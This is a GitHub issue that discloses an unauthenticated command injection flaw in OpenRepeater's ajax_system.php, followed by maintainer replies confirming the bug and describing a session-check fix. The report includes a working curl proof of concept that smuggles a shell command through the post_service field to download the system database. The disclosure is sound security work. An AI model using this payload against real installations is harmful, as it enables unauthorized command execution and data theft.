Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unauthenticated Command Injection Flaw #66

Closed
codexlynx opened this issue Mar 6, 2019 · 2 comments
Closed

Unauthenticated Command Injection Flaw #66

codexlynx opened this issue Mar 6, 2019 · 2 comments
Assignees

Comments

@codexlynx
Copy link

An unauthenticated malicious actor can execute arbitrary system commands via "functions/ajax_system.php". This has a critical impact in the security of the system, for example

  • Download system database:

$ curl <ADDRESS>/openrepeater/functions/ajax_system.php --data "post_service=;cat /var/lib/openrepeater/db/openrepeater.db" > openrepeater.db

The only limit is imagination.

Regards!

@abcrawford
Copy link
Contributor

Just wanted to reply and acknowledge that we have seen this. I have tested and reproduced your results. While the chances of an attack on one of these setups is likely slim, we will be looking at ways to address this in a future release. Thanks for your diligence.

@abcrawford
Copy link
Contributor

This should be corrected/improved. The code inside the PHP file in now wrapped inside of a session check to ensure that the user is logged in before it will execute the code. Commit 3f31127 has been applied to 2.2.x branch.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants